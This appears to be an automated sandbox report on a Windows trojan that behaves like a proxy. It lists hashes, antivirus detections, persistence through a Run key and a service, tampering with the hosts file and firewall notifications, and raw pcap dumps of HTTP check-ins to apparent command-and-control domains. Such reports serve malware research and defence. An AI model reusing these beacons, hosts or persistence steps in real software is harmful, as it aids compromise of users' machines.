Analysis Date: 2014-10-13 22:29:25

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: dfa531d16c2ec2415e251e8d7157cde9 sha1: f3b34341b037d8641500b8a6c1c2e06981a0faa5 size: 794624
Section .rdata md5: 82f70c93a475199ab9cd62d17c1e60a4 sha1: 68fd9b40c1b96f9fb93504e1b51d02bfdd7beedf size: 58880 md5: 8ce48ded547fc30bc4fb898e6f6f56e5 sha1: fa2536339098d54e3c8b982d39da09cac225e520 size: 438784
Timestamp: 2014-09-05 10:48:04
Packer: Microsoft Visual C++ ?.?
AV 360 Safe: Gen:Variant.Symmi.22722
AV Alwil (avast): no_virus
AV Arcabit (arcavir): no_virus
AV Avira (antivir): TR/Crypt.ZPACK.Gen8
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV Dr. Web: no_virus
AV Eset (nod32): Win32/Kryptik.CCLE
AV Frisk (f-prot): no_virus
AV Grisoft (avg): no_virus
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus
AV Yara APT: no_virus

Runtime Details:


↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\is0vgvt1lw7tawwnqvjnc.exe
Creates File: C:\WINDOWS\system32\zebajflqkdygw\tst
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\is0vgvt1lw7tawwnqvjnc.exe

↳ C:\Documents and Settings\Administrator\Local Settings\Temp\is0vgvt1lw7tawwnqvjnc.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Accounts Link-Layer Backup Plug TP ➝
Creates File: C:\WINDOWS\system32\vykeyqsl.exe
Creates File: C:\WINDOWS\system32\drivers\etc\hosts
Creates File: C:\WINDOWS\system32\zebajflqkdygw\lck
Creates File: C:\WINDOWS\system32\zebajflqkdygw\etc
Creates File: C:\WINDOWS\system32\zebajflqkdygw\tst
Deletes File: C:\WINDOWS\system32\\drivers\etc\hosts
Creates Process: C:\WINDOWS\system32\vykeyqsl.exe
Creates Service: Program Proxy Socket Routing Filtering - C:\WINDOWS\system32\vykeyqsl.exe

↳ Pid 804

↳ Pid 852

↳ C:\WINDOWS\System32\svchost.exe

Creates File: pipe\PCHFaultRepExecPipe

↳ Pid 1112

↳ Pid 1208

↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
Creates File: WMIDataDevice

↳ Pid 1148

↳ C:\WINDOWS\system32\vykeyqsl.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify ➝
Creates File: C:\WINDOWS\system32\zebajflqkdygw\rng
Creates File: pipe\net\NtControlPipe10
Creates File: C:\WINDOWS\system32\zluzfil.exe
Creates File: C:\WINDOWS\system32\zebajflqkdygw\lck
Creates File: C:\WINDOWS\system32\zebajflqkdygw\run
Creates File: C:\WINDOWS\TEMP\is0vgvt1s82ta.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\system32\zebajflqkdygw\cfg
Creates File: C:\WINDOWS\system32\zebajflqkdygw\tst
Creates Process: WATCHDOGPROC "c:\windows\system32\vykeyqsl.exe"
Creates Process: C:\WINDOWS\TEMP\is0vgvt1s82ta.exe -r 44082 tcp

↳ C:\WINDOWS\system32\vykeyqsl.exe

Creates File: C:\WINDOWS\system32\zebajflqkdygw\tst

↳ WATCHDOGPROC "c:\windows\system32\vykeyqsl.exe"

Creates File: C:\WINDOWS\system32\zebajflqkdygw\tst

↳ C:\WINDOWS\TEMP\is0vgvt1s82ta.exe -r 44082 tcp

Creates File: \Device\Afd\Endpoint
Winsock DNS: 239.255.255.250

Network Details:
DNS queries: Type A (queried names missing from the extracted report)
Flows TCP: 192.168.1.1:1036 ➝
Flows TCP: 192.168.1.1:1037 ➝
Flows TCP: 192.168.1.1:1039 ➝
Flows TCP: 192.168.1.1:1040 ➝
Flows TCP: 192.168.1.1:1041 ➝
Flows TCP: 192.168.1.1:1042 ➝
Flows TCP: 192.168.1.1:1043 ➝
Flows TCP: 192.168.1.1:1044 ➝
Flows TCP: 192.168.1.1:1045 ➝
Flows TCP: 192.168.1.1:1046 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 6f757468   ose..Host: south
0x00000070 (00112)   626c6f6f 642e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 616c7473   ose..Host: salts
0x00000070 (00112)   65636f6e 642e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2077 6865656c   ose..Host: wheel
0x00000070 (00112)   7265706c 792e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2077 69736864   ose..Host: wishd
0x00000070 (00112)   6973682e 6e65740d 0a0d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206d 61646570   ose..Host: madep
0x00000070 (00112)   7572652e 6e65740d 0a0d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2068 61697268   ose..Host: hairh
0x00000070 (00112)   6f75722e 6e65740d 0a0d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206d 75736963   ose..Host: music
0x00000070 (00112)   686f7572 2e6e6574 0d0a0d0a 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2068 616e6768   ose..Host: hangh
0x00000070 (00112)   6f75722e 6e65740d 0a0d0a0a 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 6f757468   ose..Host: south
0x00000070 (00112)   626c6f6f 642e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3033 3126736f   ode=sox&v=031&so
0x00000030 (00048)   783d3262 35353563 30312048 5454502f   x=2b555c01 HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 616c7473   ose..Host: salts
0x00000070 (00112)   65636f6e 642e6e65 740d0a0d 0a

 Class Hierarchy Descriptor
 Complete Object Locator
copy constructor closure
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
- CRT not initialized
dddd, MMMM dd, yyyy
default constructor closure
deque<T> too long
DOMAIN error
dynamic atexit destructor for
dynamic initializer for
eh vector constructor iterator
eh vector copy constructor iterator
eh vector destructor iterator
eh vector vbase constructor iterator
eh vector vbase copy constructor iterator
english-south africa
english-trinidad y tobago
- floating point support not loaded
great britain
invalid map/set<T> iterator
invalid string position
ios_base::badbit set
ios_base::failbit set
local static guard
local static thread guard
local vftable
local vftable constructor closure
managed vector constructor iterator
managed vector copy constructor iterator
managed vector destructor iterator
map/set<T> too long
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
omni callsig
placement delete closure
placement delete[] closure
Please contact the application's support team for more information.
pr china
program name unknown
- pure virtual function call
runtime error 
Runtime Error!
scalar deleting destructor
SING error
south africa
south korea
spanish-costa rica
spanish-dominican republic
spanish-el salvador
spanish-puerto rico
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
This program cannot be run in DOS mode.
TLOSS error
trinidad & tobago
 Type Descriptor
udt returning
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
vbase destructor
vector constructor iterator
vector copy constructor iterator
vector deleting destructor
vector destructor iterator
vector vbase constructor iterator
vector vbase copy constructor iterator
virtual displacement map
